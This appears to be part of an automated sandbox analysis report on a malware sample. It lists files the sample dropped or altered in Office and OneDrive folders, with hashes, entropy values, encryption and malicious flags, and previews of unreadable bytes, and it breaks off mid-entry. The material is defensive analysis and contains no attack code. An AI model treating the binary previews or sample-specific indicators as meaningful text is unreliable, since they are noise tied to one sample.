                                                                                                      Preview:.<?...R.....;2S..I4kmB.r.`...".....Y..f...L#/4....4.;E.......U.....;t...&6.d..M.....W..._R...>.#.5|.M..a.QLQ..J9H..J.Uqo.#..9....S.D..#...Vo,..e..........R. .......WeD,W....{B.!G..6dJ&S.!...MU..MVj@..Y...b.e.k.~w....,.^.oqd.P. "...mu.h...<.R5A...2^.;...RC]G..\...J.d... .D-.b...T..e..u.*;8.Y.Zg .g..Q....k.1.:`!.M....u.AZ...M.J.@}M...q...N..9..W.....N.{....Kq....Z.8./.z.......I1.TF......OS5..W...8:.p.T.c.9}P...Bt.Q..:.8rW.........fP..R....u.....?.y.9@....-.fM.Y.'H.UR.....a..oFa...%...q..Yf}>.|:...R.6.R.........s.)0W..m......(.K..n...eR.Mk....Q.k..D>|...M...K...+..;.F.d)e.eJT+.{..G.n?.. ..+.].+.\...m....W.).<I.'....;......G......S.C#..i&..9cB.LJP..,..2.G.&...`.u.z..W%..ZCN8....nb....@......{..9..6........Y..c#.irx...S.w.B..;.X.+.J.~V;..`.R...m.......n...r{:`......yR8i.......5.U.w....V?..._.5.E=z...C.W.[WC..c.Z?...x....`.<V....TL.=...rI..kD..i...*..>./..@#^9I...Ot8.....)....lf......B...e..=.Xi........hf.....f.......M*`...$....d/.l..T

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704200v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1714
                                                                                                      Entropy (8bit):7.8747780165727335
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ptMsScM0Hkith/5uinimlgtc6EVRYpDwYYmptneSWZMr+q0eoZVLv6bD:8L+kqui9lgtDS+p/e9Bjeo7LwD
                                                                                                      MD5:7698C57D328A55493ED6130F985C226B
                                                                                                      SHA1:A390F73DAFB45799A2AB8F978991DA1A57B9FE62
                                                                                                      SHA-256:6D5EDDDE17D39A64F806D10ACC1FFE8FDFB756A518965EC0D47FDECE8FEA2008
                                                                                                      SHA-512:97D578E0F178416C07A68DE44288661AA1F03CEA914E9CD89EE1FC75B7F8411F1B4338349555B18D0FA3ADED587E9D2BA0214F64A1A6AE9097589469A65DCBA5
                                                                                                      Malicious:false
                                                                                                      Preview:.<?*.........yg.T*;d#..b....a...V...kZZ........f}UQ;....i.`..!..q....K..B(1e..O...../..x..F:.d..$`qu...b...{..l.ir.v..).k.J0U.M_m....iP.....0. ....Q.y........{Y.pph.).U........%..>....?..m.$#g..............v.r./...ki..Q*XD.>:a..5e...P..J.........@...v.>...88.B.&.:.2)?.G8..+z6.D}...l{mj..PeO...I.,-.....l.hu...Kkl..J....p42*..g.D.Q.:...S.EP.E.$q...m.z..uK..2,..i.6.%..8..?!J.*D.I.........p..c.c..=...S....a....Q...)..sM'.{,;.1..Tu.O))0g[.Pu..H^[...8{H.7.Y0\..l....H.V..m.....^....wA..L....B.Y..........K.I#.>.B..9D..8.#...E.H..`..>34........93.{.....).I.&.......v...KX...h.=...OgV.t.S!.....Q..4.O~..G.........R.Q......$.-QEG.=...-d...;. ..Y..B.p.C....4...z.$...@`..8........].Mf.*.o.k_.....cm.U.2...I./...C,..n.r.*P.W\...8.%s...$..$.3.Z0W.K ..;a. K.eEIQ.9^...*.QA.@a....K..8..q..B.N..q..g..f..V.h..?..........RE..C....&....f3..,.........`.L....R.f..&...e<E0,..?s6..6.....e..hw.o...b.IC...x...X.%..v....y|...IY..l...Z..}..L.[t.%........W.*#.D.3U{..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704201v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1751
                                                                                                      Entropy (8bit):7.880712212651487
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:lr0JGi8PCfMmgcgvqWlXd8+/YtBAxGnAWdfWx+777nJzvfCmZWAiFdA4Yh8v6bD:lK8K+lXq5DHuxGnJzvfCmZW+4M8wD
                                                                                                      MD5:7CC2BC6E7F072540890272ED9AD320AD
                                                                                                      SHA1:4E7DF29B49C3B2386F304BCBE229C2FAD0FD96FA
                                                                                                      SHA-256:3D5FE29C31B4663FC0F1A4A3938A27E063AC7995B04DD926643BD2878F686887
                                                                                                      SHA-512:A2E005D8F21EF238F1B3909E169838ADB3953DC9D18D5826FEE7667A71704FA6CD6368506AB7FA73DFEB00838247EE53AE637C05FC6C821A985D902480D8A507
                                                                                                      Malicious:false
                                                                                                      Preview:.<?TJY]9\..z.6...H....&6.x..5oM.l...\Uv....s.OQ+...>.......1gC4....k.G..:,....SwJ>....T.8.<=>..fV.(.53.H......@,~E.(~r....s..F.G...P$.?....~.#'@].A.12. ?...O.q...................uF.....rU...M.........2&..]-...]..^N.|.VN.....d...3m..^]y3s.|t"r.A.^.D...7.+.5.JF...o.~.).Q..B.c.=.]..V..[..g.].F..CF..:..n.........<.2...[.&..@..h0M....`..gZ......:#.b.@.1....A*)...U.?..]..a..y...'E*.<.KB..2j...z........./..|P...G.p}J....,..7}/.i.,..J......V.u...j#....L+..z.....q...#.ty.........B....J.2Y...B...3.cp.K+..N@..]D.xT.gk..p{4....o..e'#%...\.qx.cU1z..A{w....e.....x{...s..s.ma..5!.1.....X._bP..k.bBf..*..6v....(..\b.n.=x.3.=..~j.&..!c...........L.......,'[lQ..X2...v.E#....A.b...c%o.K ..2....F......!..T..q.........&......]./..9r..hk...G.......Fu...kuDpW...z..1..#...}.T<MX2i....6"s3DZE.ON!.ZnQ..ecb......+...e'b.......(`.....4.`B..'.l.[....\a.~~o..4.0.gb. ..`T...........'A.D.5.4...5...G.}....z.'5>.l`2Le...nO..A...P.P..$9.>...4i ..TE...~s..x....P.Zl../bf.,

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule90401v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1583
                                                                                                      Entropy (8bit):7.8642226561347925
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ghRhzQaVz20Mq6yv0Bb7lXFjUDujo3gmoEsHuONZDo7N8p+U+K2sKTTy6Dv6bD:glQaVbM80Bnjg3oA68U+K2sK/DwD
                                                                                                      MD5:0E7CA098AC04A82EC8A7607F2F408CB9
                                                                                                      SHA1:FE9B8191295F40840F3EA181C049DC67C01CCFF2
                                                                                                      SHA-256:3C0A50F587773B0872843AE0479238033837172BFCB32DD546D8BA02D27E77BA
                                                                                                      SHA-512:D98C4B23F236F9C1B6021330945547F93B3AD118CFC10ABCCFE10E1682E4EE8BBA2150AAD435A64FD4F2566A6545CE7C749C936CC46F7A91D8D599F62E9C9376
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.... ...d...... ..K.l.2...(..~R..#..5.>.....a.>....E.+...8..j5.........D..!..P....0.f.3g..O...gC.bq.|WUo.....F...M+..n...1.q..B.fc.@.m..3c..-...yqh. .)..3.L>..7:.......-k{`..n..#.4..u....6.|....&....8O.J...M.qs.....z4....H.+.m..=u...8.#d8^9...L.T.\.{.t.LO......#Vb"...LI...t.Q..'X.w(.z..%9..N.........C.J...m.j.O...#.O._.......1.iS)....#.r....P...TU.".....8K.g...].vY.....H}+.......uM.p.....)..l.3..j!..H.os..$.....)U.b..dkZ.zh..x9....Ov9.......aa...[.3.L(.=......g.[..C;(.A.)..C.5..Pu[]X.%..^.4.......A..J.#.S..Z..4.Ne..8 ,....O..c...z....-..O.gd.qg...K:6L.M...64....A...( .E....i....8..K](..&,..e.1.W....3..}zB,...N....@o..r......f\<B.N.'...eo..~.......o#..?+=<6r..../...Y..J0p....,.g....k..sH..f....}7...:.C...M...J,h.eO...#.S9...H.3.+/......1...*.b. ..!...c3..\..mP@...C_..Lks......iS2I..^.O60G...F....&.y.;.MW.....,.K{.xJ].$.R.n.8r.~.oh.7.fl.....Y.jcU.R,.....:d=.P..T.T..W.].3.-r.f.Z..O.g.R*.h`h.y.....%@.w.i0.0.....0.>E+..'.lu..r..;.:.u.....Zm

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\setup32.exe_Rules.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):135031
                                                                                                      Entropy (8bit):7.998563706080457
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:jmLfRNDKGhJufv3IU6xCBBYU53wHId6a6w/4Mv31A7wh3NMm08ukA:Cd5pJOyCsEgH19Xwh9708PA
                                                                                                      MD5:0D13E2EF4A0F208A91E4FD731633C6A6
                                                                                                      SHA1:25C9C487C91215EA63CF1B740459E1B70DAEB881
                                                                                                      SHA-256:73EF6B4B951FB45BB53671785F5D69330C2B8928EBA4CF862CD7857A2F611EBB
                                                                                                      SHA-512:4FD26CF3434861B1CCAB09F50EC1AA69F1CD18769F888A7C23AB35A2C16A02A6F0DE7702075713EF0B6DCE419B51BC6606CBD19C0BF6C45B810F9BF3A184E50C
                                                                                                      Malicious:true
                                                                                                      Preview:<?xml.?NO...K....w.sQ.&-p......c.g.q......l.&...GKJu.2.f.\Si7.3.qKp..w.l;...0f...~l.T.U.oU...[M@.w....K....Zg.."].k.|...I..}..JQjV.....2.B&.+|...6..... d..E@.d....]Mc.&...C6...U..W.....K..'...#..'-..5.S..5'...[.....!....R.I..%....)...s5sO.%x.x..W.......%..C...*JPL**..H......lq~{.7...L.wt.}p!J.N.....6....P..x...~V.q...x...})Hrs.......Z<........ey..h..]b..N.$;.z....U;G8W..U....&3.R....-X....v)..Z...Xx...}z..!....S..f....Oi....W..]............u(NS#.bG.D..M...*....b^.^...eU..Hr...n...d6.e.\#.n..9..%-...},......1.{K{I......Z%.T..2.v.(...5.H...'..Eq...xf~..;.k..mT.....#qR.T...F..d].E%......Lg?...W........{...'.E.V...0....P..Gs.t.C*....%...R@..L.../..&U.......LCz.r.....MI.0J!jy.LYC.@t......{......[i..x+...e.d<e..~.<.K.$?o.c*J~P.Vdy)....S.~..N.....C.Q.I.........`o8y.`....e.....N...a....Q...fs.A..PRL.O.>..L...UO..K..X`.....t\...1.'U.Q..S5....v....z...R ....e...u.Aj.!...;z....8.r~.....:I.>..,.....Q.&..6.].;........E.|...YO....m........p.g.;.....)a

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\Features\1-3FeatureCache.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1152
                                                                                                      Entropy (8bit):7.8111722245269455
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:K5KLA88kgAtdI+0AYjAnMgoXT9ae7bKUEXKDLKY1v6bD:K5K3mVjMnSZTbKUZDLKY1wD
                                                                                                      MD5:77E7C0F041E3D0609953D9E6587154D4
                                                                                                      SHA1:CAE454A75AB7135B8685E86BDE79BD8AE2598A3D
                                                                                                      SHA-256:AF6B27C5A12CDD5F288447B59EA61A350B3BD69EF6568DB26CF7EC7C0C686E0B
                                                                                                      SHA-512:655D1344395173F98A810C5F38EAB2DEF3DF0D3E2490865A3B8F8A2E26CE17815A4549B5797929DE6763B05F40075CC6D1CD915CF9D99B98DC9AB080B77C1867
                                                                                                      Malicious:false
                                                                                                      Preview:1.1.9..t.=}a.j)....r..*%.......$.1.U. ^..D....I...~.....P!........Mm.k.5...J..#......e!q(4T..%.3.v...wx.,...E...GG..x/....t.{=....Lj.....a..cS..O<....zH.^..D..".:...}.....}.4.u.9..i....&.o...h....u..:$.qs...s..R.......u..?.,..s".>t..l....%n.)w..?~Z_.l...}.i9..#...:W.vw..............`D.. .......1..E.>..y..[..$y$...h.J)..,.v....M.P...=T.Ej7+..L0."S..T...5a.|x......i......V.OI.....9.C..Dq.PM.a..Y3+...].....'a.Xd...g..7@..'..(>..n\R....!.9.X.lR..+....c.*..0yS...Y_D.1#zH.(.`.h...l....+/k:D.......[..O^..Mu.C...C.zC2<..M.L.*..=.-........!.`Q..#..<kH..V.@..FK..m."..c.PN;I...:..3.........D.PCL....-B@.....E..O.o....~....:.ve`ig.......'.`.It....r..Qvyr...\.F+0..5.%..7+....=.L.M...#4....w.(lZ....^T..]........j..z../....+t....sA$.Z.(..Y.&EE.9.+.g..):=.....<..v....4......Z...........zq.q....RX#.0g.6..C3.....7.Au.t7...u.e...e.....>i=Q....Mj.....P.....;..)........t......'.y(J..s..'..[a...D.`/..k+.....qn.....,.[...c.F.........4....P.UGg.Y....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\Features\1-7FeatureCache.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1170
                                                                                                      Entropy (8bit):7.827260529975816
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:PdOf9RfV5clek0e2/VXDWaAq14Bu6eWAIERktdUulNtgv6bD:PdOffvB4q9DWalO/AIEOtdUwgwD
                                                                                                      MD5:92AAF89BA514B25BC549B7EF8E7C3F68
                                                                                                      SHA1:068A04D5D58753E00F641195A902EADC4533D7B9
                                                                                                      SHA-256:8C5C30584F6046CBF766DE33DA4824F72154A3540B4F9F3CFDC2EF5AE9D3C887
                                                                                                      SHA-512:6386EAB808E43C4C0F16E39DF8B5636DC434AF85D04694200D3C52AE00ADB12A92C257BB7F561443646F3AA96684CA5C22E74613BADD3306E54C3781E9EE8CB3
                                                                                                      Malicious:false
                                                                                                      Preview:1.1.9.......\.qG.....(zH..,]........7......R.".-...H.l.g......k|Q.H....r...*%.v...5.X.........yT...'?.~.2.....~..)>.'........7....|".%7..../.M...........3.;Sny...s.H.G....ZX....q.t.a.~.uWm..Bpn.[?.f...4...p.....)..b..1*9.Y.."....L7.+.?.n....Vx.?..r.|..<...t......0S..P.]+.@+.1........a.sA...;V)...........'z...P.gdN....B...b&..N....w.B.~[..-.......j.P....p...2...%.....U.......8...o...V....A.=.K?..r.*.....#.j..K.{Z...2AK....=;....*o.*..JKI_.@..+.d..M.d..G...v..U.,./......JTW........./..z.....Foko...k1L{.......j.h...D@..a.....ud.=]......g6y.[.f.......C]....w..?.$...).eV-!.k.L....2..t*...^..,.-.....h.5..|,.,.CQ..y.R....}..e.BW. ..K..I.Q.(=...0..4...w._N.%g.7.......d..K.[z...mo4...T.q........m'.'.....r.?5....U......$.Z..*...w.&.G..........Z[<....d.....@. .b.i_-...m..K..A.X$...<h..(I.v.....7C....x".wH..7.......R.@../..`@3../...ib.e..@...O.wk.?s.t......,...T..L.....&..a.XGl..q...j.&- ...x...x,Y.f!..\a,Tk.m.T....W..e.k..R}..V..uZ...u....L..L...c.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):37198
                                                                                                      Entropy (8bit):7.9945719173170655
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:768:uRU8S/VRV3mTuM0dvAvcnqWSKYWHhvbpztQWeKX6SFvGGLKhw2:AUn/VX3mwAYq5qzpqWeKXLKq2
                                                                                                      MD5:F5725743D23AEC75D7CA052917E8F454
                                                                                                      SHA1:13E19C869E53AADC80BAD0777D82EA1940A67BBA
                                                                                                      SHA-256:350F0E736D61915104E2D248C43D42F93CEAF4202160F77A46E00D26E57901EC
                                                                                                      SHA-512:C8A0C394BDB0766F8A2A0A08362EF7AAECC92DE0DBA9C69F08508E8472764B07B832CD43ED0B4B4E1A6D22D6CF31DB266FB2456A0A7A7D200FB653637D6845E1
                                                                                                      Malicious:true
                                                                                                      Preview:SQLit..\.>..m.~o.........V..]C....863Y..vf.\.t!...>...tOay.....{.\....e...1.H.Um..M..b.L..._.B.m.IE.h.Q'.r...z...).3..9...4b!Xd*.6C......"..>[....{!r/..[...^.I=...h...?...+.$..........VH...o/@.....G.....g{).^.iq\.B.x..9....?.B[..EPQ..yD..Q..pm...S.uIu.3...:#}..rb....}...yE k..D."h.Nz.Xs....O.dqc.2n..@.,.L...I..4.5..}.....nPG.....^.m....k0..7..<..SI.....o...7kxpN..^#.l\.P6X...o B..2.).....O..u..iU..G..2d..Q7...*b.&.u.$...^n ..(.\0..I..p..M..W...o..=...J..Ch.s..8....,.Vn..q..;.....0O.....t...H,..-n...`...@...wc....42.+..!)3eg...F....V.......zW.ev..JP..j.%..<.....@=..7."1Zaw.Tk.:u..Z9.m..`Ji.....M1.....Mj...|..@..-....pAF7jb@Y..N.>`.B...o......r..4..$ ........... .q1.IF..u..!V.......g.W.7.n*/..[T..W...o.............P....X.:..~..m/.?...@.W...lkK.A$#Z..w.{..T.U@.,.@MEM..|.*b...]......f.....X....T&.F,..z+z.zF8.(<C....^$..j.S.!..!......crz....*#?v............-1YB#.Xz...."1..zA [.{n.V..A.......`..+h+Lp0&;N..;...d.1.._!C..(..b7. P.....*......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.session

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20814
                                                                                                      Entropy (8bit):7.990725211372473
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:384:Tws50CMY5bonfeb3CMB4UwpmC03HfoEPArG1AuboNnQIj3:TwOHMY567MgE3voEPWG+HKIj3
                                                                                                      MD5:395BBB347EA10307D5A2FC8102623363
                                                                                                      SHA1:2B9A3E8879F5340573EF40F520B1EBBE097D7793
                                                                                                      SHA-256:73DA18276AC8A544980E093BCA8F908D43ACC859817FABD851C2D88D13AC48D6
                                                                                                      SHA-512:298E60865EC18CF58484C8937A9154923C88FF8180793374FB05215B510CBB790DA82EB1D49F8FE2B2AD6BFB9D3FDED7DFE871AF5EAFB78BFB32F75754756D7A
                                                                                                      Malicious:true
                                                                                                      Preview:SQLit...?.$...?.......U&j.f..p..T.66.Q......3....8.X.W...js+.r,c.3/..5..5..$.N......k-p.v.......A.....}P.<..I.O....,+O...*..+._.d)P.w..3...Z,......Sz.p#...=M[.6g_...K...F..B...Obdb.zgY...d.....|6.t..B..q....\...h../..W.?f.7[_u!...i,.B.;X....9.p....21....4..N.&.....e)]....s...@....(N......0.....R..T.s..I.m/...$.Z...@g~ p.X..1..o...o...R./.......=.I.=.}.T...J..D<.3.D#...U.Z.....?<......2..g....>W4..3z....+.U.,...W.Y\..O.CF.u&T]..D.65.....<.......4r.SWUb.^OgD.QS........th....N.gbQ....f7.:..,...>..V.W-g.b.L...Z...N...G.5.....h&.z..-.S5}......"....l...R....c..s..jZ.KB.....j.....5........`....]..L0GU.O..X........N.CJ.`...+i...].6.-n..N..;.!8.O ...z.{. B4...t.OjE...n....^u...DbJ.o...'.n ?&.i3B.>4=..H&.5..../..S.mU.C......'(2.B.w..V$&..s|.2..f...q....(..L..W..kDN....(.BW.".#....#a3.G.ly.I.r..8..I...U...S..8.L0.....K....z.M..}z*......6..v....I+.me=..........$q/.....K.f.....{....[.YZ....Y`v&sm.:.1...*bc.D.-..(_`/a....d.`0...yga]6.zU.....;.1UI.h.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2023-10-04.0953.5356.1.odl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.705342206954216
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:t6ARfCSGsgWpjVUGmf1rXxnwWK0XxTXZgE3wZ:hRfFgWpCG2rXBrxTXmE3w
                                                                                                      MD5:CAB2FCD9C9D3FF2CF234B626C91C2A1A
                                                                                                      SHA1:5421FA861EC65ED885004D786B9C4CB745F6838A
                                                                                                      SHA-256:50DDFAE1981C64941948BC15B7DCC588F9B45245A7C7C45AF496A25FC814F756
                                                                                                      SHA-512:5EC6FECB9FD550CC42FD2167002AB065BD1AC7C449550204E1DEE5451A8750AB3C75515263C1A8C06FE20CC5EEAAD891D13B885BB815E5DBCE5455D6FC50C793
                                                                                                      Malicious:false
                                                                                                      Preview:EBFGO...s.....$.Y.G........V-&.......J.d..Sp..n......B....#..3O..2...B.p........!.g....r.......zyk...k.K(T....c.(['.._..rU..<<Ux8...^P.|..........ZC.).,.<~]AlDt.....JhT....Vv..a..g%..P2...o[..'..J..B..9..X..K>...nW....DeO......kV.z..h......Q.8..z..T4eXo1.@."..3.e.AD5 .Uf$g6.>~_.V3.v....^(`..w3^||GKXn..[..k..N.l.4..$..i....[H.c.d... .....<_.6.%..}.o.gT0. .y.R..N..{6.]...>5.R..E....<!..1..h.{.......m~%...7L(.4}M...M..u....S..xl.b..zS..:@...*....4......L.(8K..4.......F.S....=.x.|{Jpn&)......^.2....R...n.e..4.^.@..2\xp..=.A...!B.5.%..&M.%.N%.iV\...5..rGHe.....].<..5.....3..$..7;.w..T..aIO..J.....t.....03.7s>^d..rP..8...!..61X..e.'........0....U.,+bhN..o.a..v..7...X.........z.Hf..+L.6R$...xY.....8].o.sF"k.B.I..@.B.S..q..5.6-_........@R.@.:f.n...r......Wf"@....y3.........1..0..8.=.*9v}.A .7.ljp..k . ...o.......k.'....J...2Z.......3.lG....%....=O\<\..c9c..3..>fq....%..-..)...%..Y..NL..S.?...T.Q;.FkRG'....IEbj.b.FHb.......Z`.B.f..0..6..:...w~

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2023-10-04.1052.6292.1.odl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.7687337945852352
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:tb6GzR9zJDtxWJGiF/GrsLB1AqofxRBIkX48i8h5TmgRQV:tb6WVbMGiFOrsLnAqqSkX48i8brQ
                                                                                                      MD5:4322B3E3D0F56EF4185D6A306DEBD364
                                                                                                      SHA1:201AC21FDCC6DAC6BF517566FF2DC47333406E1E
                                                                                                      SHA-256:C2F91C5F80B4B20ECEB278DAA8F55CF80B8D77F368115C586603E1082AEC2B3A
                                                                                                      SHA-512:A94B58C5272C1ABF81E9631D4958AB9E29BAE11F804956B0F364A2EF53E6C36B02DDDB0F2B766680FEE8A4CC2F2F6E8E3563A5D7679BCE711F0EC2079E27FB56
                                                                                                      Malicious:false
                                                                                                      Preview:EBFGO. ..[k.g....Jw..a.3t1E.z%.v..L3......:;...5L;"S...l....L|v.C.M..z...C1R/..C..+6V.RR.....l..r.....-M...F......(%.x...=...<`...<...4......<.........rd.0...@3...^.NIn,L.....V....v.9..v5jR...d.A....1.K%u.0a>.f{J..\..p..P..q.}:A.7M......WqK.I...U...RT.Q....B+.f.ab..@_ezb..lt..W...@.0.h.znr.H6H.P...{<Ox.l.....GJ*.'i ....Im.=,s.A..S......w?.[...&9.Z%...M.W....%3.K^..dv.B...t..R.E.w..(jL4h......;\......Xf..1.h.#1.Q..k.N.:.....\8...d....D..?.q.......;.....n.G~4s9-.<./...D.....bfP...DT.F.B.]v..b..t...+...........s.....E..K.TY..qy.b.Q1.P*..>.Ni$..AK...ay.".&.Q.I.`x?...=..~X}.7T:G...S..&.<.........V.........\PW...d..E...F......v)bq..o. ..$.p.up.=..;..3......}...b?..y..d.N..|.^..<.6..zU.*.....e.p.$.(..8A#a....YP.^S.+.,.+m.9.SQ: Wy...O3b.f...}J$...).LC8.K".e.T...~...bq......#}.......]p.c1...H.w.....k.=.Z...+..-.....:..?Zy.........Q...N.y*.z.#1q..N.Z.Hr...c[5...>..(=..^'!"...W.M.[O.+.<..x.@.b...?...Ly...?x.7@.%..4(...Q....q.V..c..z.x.Q|bZK.c..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\telemetry-dll-ramp-value.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):344
                                                                                                      Entropy (8bit):7.26536402950109
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:iYKdQV0KwGqTyear8dR/xcbsXwWFJ6PbaOAL9TtvwaU/m5FAmXElNHet32ixNnXc:IbwqGrr8dR/absgi6PbDAJTdwfIFDXEB
                                                                                                      MD5:10E29CC0492921BDF94BB3BFFF4CE2C8
                                                                                                      SHA1:678E6923B47A68275BC13B574E51A79B1B381D30
                                                                                                      SHA-256:58AF4503A9333EFA95BC0F80EE56CE1FC9DFEE024D0519FE7B0A6B6586822BA7
                                                                                                      SHA-512:1FF5FADA44C252F581DA575DA997187C41D6AD20F2943515E0A98EFD582755B2E708DCC477CEDBBC8EBC385E596925209A540B9E6199AC424B47AC92866EED79
                                                                                                      Malicious:false
                                                                                                      Preview:2..0,pM"..&CK..^x."E.#/..zM..........k..py..'..%... =.Gv........O.u.6v^...S...Z.i..il.P.<#.Ci..).i...n. .o..+O..-i...9..!N=..lr..r........nc..W ;xo....5_p.4.>.K....d.........7.....e...).....W.....P..KQPV....t....9..F...g{.(.;....,x..r....G.#._7.......;hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2023-10-03.1149.2948.1.odl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):1.0427822742706603
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:nXKrpz9p1IgDmobAGX2CA3hDVeeDSF02ngGb7+8WwMb+RnTxZ8u9N:nXwPp1IK2X31VeeDd297WbEvN
                                                                                                      MD5:5286F10B9E832857F8D5554586FDD9D7
                                                                                                      SHA1:C1475B769E08BC8C24E287EC31CCFB57F4A37AE7
                                                                                                      SHA-256:A74BDC20000CCC5789F9188BF1E85515DA59212674900744955011A3D92E7FFB
                                                                                                      SHA-512:49FE00E9345395CB4FFAEC90F6D0864BD05E60013674AE265A32661D1EAD9BAAAF0EC5C8A92EAC64F17D7CDCE72E5E2CA736D8F18269183B29F12DDD57A06D4F
                                                                                                      Malicious:false
                                                                                                      Preview:EBFGO.A......J..$..~.*KF.M..........\J.]e.Tl.e...~..FW......x>.w..........ub..5..l.....nE.x..Y....*v...r.>.......n'.Z.2...p.O .)(B..p.".. ...O.C.Q..6\.Sr.m..Aa.E..c...K......Y...T.Q.{.b.........U....; ..w0kB..H..JK...l.r.9.E.v&sA86y.....P.....W|:N..[.A..c.....$...3.....0R..4.......t.. ..R.~. O[....qn..XW.hi.]..9..a...[.. ...J./.}.z.y.g..'.+DVA.......:.=....q.../...Zj...q,.j)..\..K.8......v/D.t..........jw...f...g."...o....,...,x......F.Q..?..9.`........8.z.*...z..V..8..1.....BZ.d,.!..........:._..c{]..V._..W...........,.u...k..[...(...9?+Y..9c/..U..E...oc....WL........e..!.GZ0.(O..?Z.}......o.:."..."...t.ld..J:.f.!5.t'.p.A31....!...M)..b.Jw...:.L.NS......`...JhI...uR..W..5D...qH...]>..b.y!.....Q..lO.._/y8{.8.U...q.)....e.#..P....S..W}....FXn...q3<...J^3...}..g...8..H...=./ytW..a.xukv..........i..A...K0..Y.k..T....Cg....l.....m-^ e.L.:....D7].|.6)..h...Oj.....ULH.`..8.R.fD.t.1.....Z.;......I ..L...y.J...x.g(g..^....X<.....M..'.GuQ..".

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2023-10-03.1150.4240.1.aodl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):1.2771901634683378
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:fGOt2pSLTZX4AYBgYOHLhxKo1jBsmJ1PbOejcpcoceP+U9p63DiWGqtnGtTy+H:8OTZ8nYxEmJ1PbGxGWoDi5cOTy+
